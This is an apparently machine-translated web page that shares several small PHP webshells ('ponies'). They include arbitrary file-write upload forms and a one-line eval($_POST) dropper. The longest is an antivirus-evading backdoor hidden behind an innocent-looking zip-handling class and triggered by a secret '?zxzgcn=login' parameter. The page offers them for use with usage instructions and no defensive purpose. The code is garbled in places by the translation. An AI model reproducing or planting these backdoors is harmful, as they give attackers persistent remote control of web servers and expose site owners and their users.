Super Small PHP Pony summary (easy to find back door friends) _php instance

Author: Spider
I've got a little php pony, too.

Copy Code code as follows:

<?php
Header ("content-type:text/html; charset=gb2312 ");
if (GET_MAGIC_QUOTES_GPC ()) foreach ($_post as $k => $v) $_post[$k] = stripslashes ($v);
?>
<form method= "POST" >
Save file name: <input type= "text" name= "file" size= "" value= " echo str_replace (' \ \ ', '/', __file__)?> ">
<br><br>
<textarea name= "text" cols= "rows=" ></textarea>
<br><br>
<input type= "Submit" name= "Submit" value= "Save" >
<form>
<?php
if (isset ($_post[' file '))
{
$fp = @fopen ($_post[' file '], ' WB ');
Echo @fwrite ($fp, $_post[' text '))? ' Save success! ': ' Save failure! '
@fclose ($FP);
}
?>

Last night bored to see the PHP tutorial, found that PHP is really very powerful ah! By the way, I wrote a PHP Pony
Here's a direct code.

Copy Code code as follows:

<title >By:SinCoder</title>
<font color=red size=6>php Pony by:sincoder</br></font>
? echo "</br> Path of this program:". __file__.
"</br> Server operating system:". Php_os.
"</br> Server IP Address:". gethostbyname ($_server["SERVER_NAME"]).
"</br>php version:". Php_version;
?>
<form action =.? Echo strrchr (__file__, "\ \");?> method= "POST" >
The data to be submitted:</br>
<textarea type= "text" name= "Data" rows= "cols=" >
</textarea>
</br>
Save path: <input type= "text" name= "dir"/>
</br>
<input type= "Submit" value= "submitted"/>
</form>
?
if (!) ( Isset ($_post["Data"]) && isset ($_post["dir"))
Exit ();
if (strlen ($_post["Data")) >0 && strlen ($_post["dir"]) >0)
{
$p _file=fopen ($_post["dir"], "a");
if (! $p _file)
Echo Write Failed! Please try a different catalogue! ";
Else
echo "ok!! ";
Fputs ($p _file,$_post["Data"]);
Fclose ($p _file);
}
Else
echo "Please fill in the data completely!" ";
?>

PHP A word pony's back door

Copy Code code as follows:

<?fputs (fopen (jb51.php,w), <?eval ($_post[jb51));? >)?>

After this access, generate the jb51.php content in the current directory as <?eval ($_post[jb51]);? >)?> 's Word pony, password for jb51
Latest kill PHP Pony

Copy Code code as follows:

<?php
Class zip
{
var $datasec, $ctrl _dir = Array ();
var $eof _ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old _offset = 0; var $dirs = Array (".");
function get_list ($zip _name)
{
$ret = ';
$zip = @fopen ($zip _name, ' RB ');
if (! $zip) return (0);
$centd = $this->readcentraldir ($zip, $zip _name);
@rewind ($zip);
@fseek ($zip, $centd [' offset ']);
for ($i =0; $i < $centd [' entries ']; $i + +)
{
$header = $this->readcentralfileheaders ($zip);
$header [' index '] = $i $info [' filename '] = $header [' filename '];
$info [' stored_filename '] = $header [' Stored_filename '];
$info [' size '] = $header [' size ']; $info [' Compressed_size ']= $header [' compressed_size '];
$info [' CRC '] = Strtoupper (Dechex ($header [' CRC ']);
$info [' mtime '] = $header [' Mtime ']; $info [' comment '] = $header [' comment '];
$info [' folder '] = ($header [' External ']==0x41ff0010| | $header [' External ']==16] 1:0;
$info [' index '] = $header [' index ']; $info [' status '] = $header [' status '];
$ret []= $info; Unset ($header);
}
return $ret;
}
function Add ($files, $compact)
{
if (!is_array ($files [0])) $files =array ($files);
for ($i =0; $files [$i]; $i + +) {
$FN = $files [$i];
if (!in_array (dirname ($fn [0]), $this->dirs))
$this->add_dir (dirname ($fn [0]));
if (basename ($fn [0]))
$ret [basename ($fn [0])]= $this->add_file ($FN [1], $FN [0], $compact);
}
return $ret;
}
function Get_file ()
{
$data = Implode (", $this-> datasec);
$ctrldir = Implode (", $this-> Ctrl_dir);
Return $data. $ctrldir. $this-> Eof_ctrl_dir.
Pack (' V ', sizeof ($this-> ctrl_dir)). Pack (' V ', sizeof ($this-> ctrl_dir)).
Pack (' V ', strlen ($ctrldir)). Pack (' V ', strlen ($data)). "\x00\x00";
}
function Add_dir ($name)
{
$name = Str_replace ("\", "/", $name);
$FR = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$fr. = Pack ("V", 0). Pack ("V", 0). Pack ("V", 0). Pack ("V", strlen ($name));
$fr. = Pack ("V", 0). $name. Pack ("V", 0). Pack ("V", 0). Pack ("V", 0);
$this-> datasec[] = $FR;
$new _offset = strlen (Implode ("", $this->datasec));
$cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$cdrec. = Pack ("V", 0). Pack ("V", 0). Pack ("V", 0). Pack ("V", strlen ($name));
$cdrec. = Pack ("V", 0). Pack ("V", 0). Pack ("V", 0). Pack ("V", 0);
$ext = "\xff\xff\xff\xff";
$cdrec. = Pack ("V"), pack ("V", $this-> old_offset). $name;
$this-> ctrl_dir[] = $cdrec;
$this-> old_offset = $new _offset;
$this-> dirs[] = $name;
}
function Add_file ($data, $name, $compact = 1)
{
$name = str_replace (' \ \ ', '/', $name);
$dtime = Dechex ($this->dostime ());
$hexdtime = ' \x '. $dtime [6]. $dtime [7]. ' \x '. $dtime [4]. $dtime [5]
. ' \x '. $dtime [2]. $dtime [3]. ' \x '. $dtime [0]. $dtime [1];
Eval (' $hexdtime = '. $hexdtime. '";');
if ($compact)
$FR = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00". $hexdtime;
else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00". $hexdtime;
$unc _len = strlen ($data); $CRC = CRC32 ($data);
if ($compact) {
$zdata = gzcompress ($data); $c _len = strlen ($zdata);
$zdata = substr (substr ($zdata, 0, strlen ($zdata)-4), 2);
}else{
$zdata = $data;
}
$c _len=strlen ($zdata);
$fr. = Pack (' V ', $CRC). Pack (' V ', $c _len). Pack (' V ', $unc _len);
$fr. = Pack (' V ', strlen ($name)). Pack (' V ', 0). $name. $zdata;
$fr. = Pack (' V ', $CRC). Pack (' V ', $c _len). Pack (' V ', $unc _len);
$this-> datasec[] = $FR;
$new _offset = strlen (Implode (', $this->datasec));
if ($compact)
$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00";
else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00";
$cdrec. = $hexdtime. Pack (' V ', $CRC). Pack (' V ', $c _len). Pack (' V ', $unc _len);
$cdrec. = Pack (' V ', strlen ($name)). Pack (' V ', 0). Pack (' V ', 0);
$cdrec. = Pack (' V ', 0). Pack (' V ', 0). Pack (' V ', 32);
$cdrec. = Pack (' V ', $this-> old_offset);
$this-> old_offset = $new _offset;
$cdrec. = $name;
$this-> ctrl_dir[] = $cdrec;
return true;
}
function Dostime () {
$timearray = getdate ();
if ($timearray [' Year '] < 1980) {
$timearray [' year '] = 1980; $timearray [' mon '] = 1;
$timearray [' mday '] = 1; $timearray [' hours '] = 0;
$timearray [' minutes '] = 0; $timearray [' seconds '] = 0;
}
Return (($timearray [' Year ']-1980) << 25) | ($timearray [' mon '] << 21) | ($timearray [' Mday '] << 16) | ($timearray [' hours '] << 11) |
($timearray [' minutes '] << 5) | ($timearray [' seconds '] >> 1);
}
Unzip the entire compression pack
Directly with Extract will have a path problem, this function first from the list to obtain file information and create all the directories before running Extract
function Extractall ($ZN, $to)
{
if (substr ($to, -1)!= "/") $to. = "/";
$files = $this->get_list ($ZN);
$CN = count ($files);
if (Is_array ($files))
{
for ($i =0; $i < $CN; $i + +)
{
if ($files [$i] [' folder ']==1] {
@mkdir ($to. $files [$i] [' filename '], $GLOBALS [' Cfg_dir_purview ']);
@chmod ($to. $files [$i] [' filename '], $GLOBALS [' Cfg_dir_purview ']);
}
}
}
$this->extract ($ZN, $to);
}
function Extract ($ZN, $to, $index = Array (-1))
{
$ok = 0; $zip = @fopen ($ZN, ' RB ');
if (! $zip) return (-1);
$cdir = $this->readcentraldir ($zip, $ZN);
$pos _entry = $cdir [' offset '];
if (!is_array ($index)) {$index = array ($index);}
For ($i =0 isset ($index [$i]); $i + +) {
if (Intval ($index [$i])!= $index [$i]| | $index [$i]> $cdir [' Entries '])
Return (-1);
}
for ($i =0; $i < $cdir [' entries ']; $i + +)
{
@fseek ($zip, $pos _entry);
$header = $this->readcentralfileheaders ($zip);
$header [' index '] = $i; $pos _entry = Ftell ($zip);
@rewind ($zip); Fseek ($zip, $header [' offset ']);
if (In_array ("-1", $index) | | In_array ($i, $index))
$stat [$header [' filename ']]= $this->extractfile ($header, $to, $zip);
}
Fclose ($zip);
return $stat;
}
function Readfileheader ($zip)
{
$binary _data = fread ($zip, 30);
$data = Unpack (' vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/vcrc/vcompressed_size/vsize/vfilename_len/ Vextra_len ', $binary _data);
$header [' filename '] = fread ($zip, $data [' Filename_len ']);
if ($data [' Extra_len ']!= 0) {
$header [' extra '] = Fread ($zip, $data [' Extra_len ']);
else {$header [' extra '] = ';}
$header [' compression '] = $data [' compression ']; $header [' size '] = $data [' Size '];
$header [' compressed_size '] = $data [' compressed_size '];
$header [' CRC '] = $data [' CRC ']; $header [' flag '] = $data [' flag '];
$header [' mdate '] = $data [' mdate ']; $header [' mtime '] = $data [' Mtime '];
if ($header [' mdate '] && $header [' mtime ']) {
$hour = ($header [' Mtime ']&0xf800] >>11; $minute = ($header [' Mtime ']&0x07e0) >>5;
$seconde = ($header [' Mtime ']&0x001f) *2; $year = ($header [' mdate ']&0xfe00] >>9) +1980;
$month = ($header [' mdate ']&0x01e0) >>5; $day = $header [' Mdate ']&0x001f;
$header [' mtime '] = Mktime ($hour, $minute, $seconde, $month, $day, $year);
}else{$header [' mtime '] = time ();}
$header [' stored_filename '] = $header [' filename '];
$header [' status '] = "OK";
return $header;
}
function Readcentralfileheaders ($zip) {
$binary _data = fread ($zip, 46);
$header = Unpack (' vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/vcrc/vcompressed_size/ Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/vexternal/voffset ', $binary _data);
if ($header [' Filename_len ']!= 0)
$header [' filename '] = fread ($zip, $header [' Filename_len ']);
else $header [' filename '] = ';
if ($header [' Extra_len ']!= 0)
$header [' extra '] = Fread ($zip, $header [' Extra_len ']);
else $header [' extra '] = ';
if ($header [' Comment_len ']!= 0)
$header [' comment '] = fread ($zip, $header [' Comment_len ']);
else $header [' comment '] = ';
if ($header [' mdate '] && $header [' mtime '])
{
$hour = ($header [' Mtime '] & 0xf800) >> 11;
$minute = ($header [' Mtime '] & 0x07e0) >> 5;
$seconde = ($header [' Mtime '] & 0x001f) *2;
$year = (($header [' Mdate '] & 0xfe00) >> 9) + 1980;
$month = ($header [' Mdate '] & 0x01e0) >> 5;
$day = $header [' mdate '] & 0x001f;
$header [' mtime '] = Mktime ($hour, $minute, $seconde, $month, $day, $year);
} else {
$header [' mtime '] = time ();
}
$header [' stored_filename '] = $header [' filename '];
$header [' status '] = ' OK ';
if (substr ($header [' filename '],-1) = = '/')
$header [' external '] = 0x41ff0010;
return $header;
}
function Readcentraldir ($zip, $zip _name)
{
$size = filesize ($zip _name);
if ($size < 277) $maximum _size = $size;
else $maximum _size=277;
@fseek ($zip, $size-$maximum _size);
$pos = Ftell ($zip); $bytes = 0x00000000;
while ($pos < $size)
{
$byte = @fread ($zip, 1); $bytes = ($bytes << 8) | Ord ($byte);
if ($bytes = = 0x504b0506) {$pos + +; break;} $pos + +;
}
$data = @unpack (' Vdisk/vdisk_start/vdisk_entries/ventries/vsize/voffset/vcomment_size ', Fread ($zip, 18));
if ($data [' comment_size ']!= 0) $centd [' comment '] = fread ($zip, $data [' comment_size ']);
else $centd [' comment '] = '; $centd [' entries '] = $data [' Entries '];
$centd [' disk_entries '] = $data [' disk_entries '];
$centd [' offset '] = $data [' offset ']; $centd [' disk_start '] = $data [' Disk_start '];
$centd [' size '] = $data [' Size ']; $CENTD [' disk '] = $data [' Disk '];
return $CENTD;
}
function Extractfile ($header, $to, $zip)
{
$header = $this->readfileheader ($zip);
$header [' external '] = (!isset ($header [' external '])? 0: $header [' external ']);
if (substr ($to, -1)!= "/") $to. = "/";
if (! @is_dir ($to)) @mkdir ($to, $GLOBALS [' Cfg_dir_purview ']);
if (!) ( $header [' External ']==0x41ff0010) &&! ($header [' External ']==16)]
{
if ($header [' Compression ']==0)
{
$fp = @fopen ($to. $header [' filename '], ' WB ');
if (! $fp) return (-1);
$size = $header [' compressed_size '];
while ($size!= 0)
{
$read _size = ($size < 2048 $size: 2048);
$buffer = Fread ($zip, $read _size);
$binary _data = Pack (' a '. $read _size, $buffer);
@fwrite ($fp, $binary _data, $read _size);
$size-= $read _size;
}
Fclose ($FP);
Touch ($to. $header [' filename '], $header [' mtime ']);
}else{
$fp = @fopen ($to. $header [' filename ']. GZ ', ' WB ');
if (! $fp) return (-1);
$binary _data = Pack (' va1a1va1a1 ', 0x8b1f, Chr ($header [' compression ']),
CHR (0x00), Time (), Chr (0x00), CHR (3));
Fwrite ($fp, $binary _data, 10);
$size = $header [' compressed_size '];
while ($size!= 0)
{
$read _size = ($size < 1024 $size: 1024);
$buffer = Fread ($zip, $read _size);
$binary _data = Pack (' a '. $read _size, $buffer);
@fwrite ($fp, $binary _data, $read _size);
$size-= $read _size;
}
$binary _data = Pack (' VV ', $header [' CRC '], $header [' size ']);
Fwrite ($fp, $binary _data,8); Fclose ($FP);
$GZP = @gzopen ($to. $header [' filename ']. GZ ', ' RB ') or die ("Cette archive est compress");
if (! $gzp) return (-2);
$fp = @fopen ($to. $header [' filename '], ' WB ');
if (! $fp) return (-1);
$size = $header [' Size '];
while ($size!= 0)
{
$read _size = ($size < 2048 $size: 2048);
$buffer = Gzread ($gzp, $read _size);
$binary _data = Pack (' a '. $read _size, $buffer);
@fwrite ($fp, $binary _data, $read _size);
$size-= $read _size;
}
Fclose ($FP); Gzclose ($GZP);
Touch ($to. $header [' filename '], $header [' mtime ']);
@unlink ($to. $header [' filename ']. GZ ');
}}
return true;
}
}
if ($_get[' ZXZGCN ']== ' login ') {
Header ("content-type:text/html; charset=gb2312 ");
if (GET_MAGIC_QUOTES_GPC ()) foreach ($_post as $k => $v) $_post[$k] = stripslashes ($v);
?>
<form method= "POST" >
Save to: <input type= "text" name= "file" size= "" value= " echo str_replace (' \ \ ', '/', __file__)?> ">
<br><br>
<textarea name= "text" cols= "rows=" ></textarea>
<br><br>
<input type= "Submit" name= "Submit" value= "Save" >
<form>
<?php
if (isset ($_post[' file '))
{
$fp = @fopen ($_post[' file '], ' WB ');
Echo @fwrite ($fp, $_post[' text '))? ' succed! ': ' faled! ';
@fclose ($FP);
}
}
?>

Usage Xxx.php?zxzgcn=login